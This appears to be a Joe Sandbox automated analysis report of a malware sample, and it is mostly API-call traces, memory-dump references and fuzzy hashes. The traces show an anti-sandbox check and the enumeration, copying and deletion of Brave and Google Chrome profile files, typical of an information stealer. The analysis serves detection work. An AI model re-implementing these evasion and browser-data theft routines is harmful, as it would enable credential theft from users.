                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 01012B1A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 270114da86c2725df70bbe0d3199f39220afd0a2e05f03067a68ae162501f3a3
                                • Instruction ID: 736e6b39d13ad3f4c20047f333886086ab95181d49ea50c5f113ad88708dff46
                                • Opcode Fuzzy Hash: 270114da86c2725df70bbe0d3199f39220afd0a2e05f03067a68ae162501f3a3
                                • Instruction Fuzzy Hash: 1701D672B44258ABDB20DF99EC49B9DFBB8F744B21F10026AF919D3780D779190087A1
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF104D
                                • ExitProcess.KERNEL32 ref: 00FF1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FF106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00FF10AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: a192913010ffdf59068df3c36f1ddc2c9cd9f9003a31357e05e6bbe8b8261065
                                • Instruction ID: 68385d776e4498ba5b0fbe5e6d1804a0fc997c369384c14f694137daed90908b
                                • Opcode Fuzzy Hash: a192913010ffdf59068df3c36f1ddc2c9cd9f9003a31357e05e6bbe8b8261065
                                • Instruction Fuzzy Hash: 82E0CD707843187FEA310B719C0DF1A3A6CDF01B18F100054F300E90D1E5A9A8419B34
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010023D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010023F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01002402
                                • lstrlen.KERNEL32(\*.*), ref: 0100240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 01002436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01002486
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 74816846821672f9836f30d0567bbc88fda208862c037f8cd2ac297a60ed0f44
                                • Instruction ID: e635219581b3f1a3928dae81e7d4720dc33109df8d5ac95fb1af16901fb3030d
                                • Opcode Fuzzy Hash: 74816846821672f9836f30d0567bbc88fda208862c037f8cd2ac297a60ed0f44
                                • Instruction Fuzzy Hash: 51A28530901219AFEF72AF79DC8DAAE7BF8AF04704F044068FA45E7295DB78D9419B50
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF16E2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF176C
                                • lstrcat.KERNEL32(00000000), ref: 00FF1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1875
                                • lstrcat.KERNEL32(00000000), ref: 00FF187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF18FE
                                • lstrlen.KERNEL32(01021794), ref: 00FF1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1929
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1966
                                • lstrlen.KERNEL32(\*.*), ref: 00FF1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00FF199A
                                  • Part of subcall function 01014040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0101406D
                                  • Part of subcall function 01014040: lstrcpy.KERNEL32(00000000,?), ref: 010140A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1A16
                                • lstrlen.KERNEL32(01021794), ref: 00FF1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1A41
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1A81
                                • lstrlen.KERNEL32(01021794), ref: 00FF1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1AAC
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00FF1B45
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 00FF1B70
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 00FF1B8A
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1C03
                                • lstrlen.KERNEL32(01021794), ref: 00FF1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1C31
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1C74
                                • lstrlen.KERNEL32(01021794), ref: 00FF1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1CA2
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1CAE
                                • lstrlen.KERNEL32(?), ref: 00FF1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1CE9
                                • lstrlen.KERNEL32(01021794), ref: 00FF1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1D14
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1DEB
                                • lstrlen.KERNEL32(01021794), ref: 00FF1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1E19
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1E56
                                • lstrlen.KERNEL32(01021794), ref: 00FF1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1E81
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1E8D
                                • lstrlen.KERNEL32(?), ref: 00FF1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00FF1F45
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1F9F
                                • lstrlen.KERNEL32(00D68980), ref: 00FF1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1FE3
                                • lstrlen.KERNEL32(01021794), ref: 00FF1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF200E
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF204D
                                • lstrlen.KERNEL32(01021794), ref: 00FF2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2075
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 2e300bbe66b143de948c1c9023c426ec32e48e2dcd41634b98bb0f62f9d6fdc2
                                • Instruction ID: 967f21ff51d9561af4d6a6e5e0ac8a3fc521520a8d3de9af2eaa7f72d27c954b
                                • Opcode Fuzzy Hash: 2e300bbe66b143de948c1c9023c426ec32e48e2dcd41634b98bb0f62f9d6fdc2
                                • Instruction Fuzzy Hash: 72927E3190121EEBDB31AF64DD89ABE77B9BF40714F040128FA09A7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDBEF
                                • lstrlen.KERNEL32(01024CA8), ref: 00FFDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC17
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 00FFDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC4C
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDC8F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00FFDCD0
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 00FFDCF0
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 00FFDD0A
                                • lstrlen.KERNEL32(0101CFEC), ref: 00FFDD1D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDD7B
                                • lstrlen.KERNEL32(01021794), ref: 00FFDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDA3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDDAF
                                • lstrlen.KERNEL32(?), ref: 00FFDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDE19
                                • lstrlen.KERNEL32(01021794), ref: 00FFDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDE6F
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDE7B
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDEBB
                                • lstrlen.KERNEL32(01021794), ref: 00FFDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFDEE6
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDEF2
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFA5
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFDFB1
                                • lstrlen.KERNEL32(00D68B90), ref: 00FFDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDFF4
                                • lstrlen.KERNEL32(01021794), ref: 00FFDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE022
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FFE02E
                                • lstrlen.KERNEL32(00D689C0), ref: 00FFE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00FFE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FFE0E7
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE11F
                                • lstrlen.KERNEL32(00D6D398), ref: 00FFE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE155
                                • lstrcat.KERNEL32(00000000,?), ref: 00FFE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE19F
                                • lstrcat.KERNEL32(00000000), ref: 00FFE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FFE1F9
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE22F
                                • lstrlen.KERNEL32(00D68980), ref: 00FFE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE261
                                • lstrcat.KERNEL32(00000000,00D68980), ref: 00FFE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 00FFE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00FFE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE349
                                • DeleteFileA.KERNEL32(?), ref: 00FFE381
                                • StrCmpCA.SHLWAPI(?,00D6D158), ref: 00FFE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE445
                                • StrCmpCA.SHLWAPI(?,00D689C0), ref: 00FFE468
                                • StrCmpCA.SHLWAPI(?,00D68B90), ref: 00FFE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00FFE4E0
                                • StrCmpCA.SHLWAPI(?,00D6D338), ref: 00FFE58E
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FFE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00FFE776
                                • DeleteFileA.KERNEL32(?), ref: 00FFE7D2
                                • StrCmpCA.SHLWAPI(?,00D688A0), ref: 00FFE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FFE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 2635522530-726946144
                                • Opcode ID: c93439aba349cb1c0e876f69c48131f01cbd947ada324b15bf37388033409d1f
                                • Instruction ID: 4cd5fd25ec5efed9378f06695818c6b5e10f012c7a49812518d8fb3454b7267b
                                • Opcode Fuzzy Hash: c93439aba349cb1c0e876f69c48131f01cbd947ada324b15bf37388033409d1f
                                • Instruction Fuzzy Hash: 2A929C71A1021DABDF30EF64DC89ABE77B9AF44310F044128FA45A7264DB78DD45EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010018D2
                                • lstrlen.KERNEL32(\*.*), ref: 010018DD
                                • lstrcpy.KERNEL32(00000000,?), ref: 010018FF
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 0100190B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001932
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01001947
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 01001967
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01001981
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010019BF
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010019F2
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001A1A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001A25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001A4C
                                • lstrlen.KERNEL32(01021794), ref: 01001A5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001A80
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001AB4
                                • lstrlen.KERNEL32(?), ref: 01001AC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001AE5
                                • lstrcat.KERNEL32(00000000,?), ref: 01001AF3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001B19
                                • lstrlen.KERNEL32(00D68920), ref: 01001B2F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001B59
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001B64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001B8F
                                • lstrlen.KERNEL32(01021794), ref: 01001BA1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001BC3
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001BCF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001BF8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001C25
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001C30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001C57
                                • lstrlen.KERNEL32(01021794), ref: 01001C69
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001C8B
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001C97
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001CC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001CEF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001CFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001D21
                                • lstrlen.KERNEL32(01021794), ref: 01001D33
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001D55
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001D61
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001D8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001DB9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01001DC4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001DED
                                • lstrlen.KERNEL32(01021794), ref: 01001E19
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001E36
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001E42
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001E68
                                • lstrlen.KERNEL32(00D6D3F8), ref: 01001E7E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001EB2
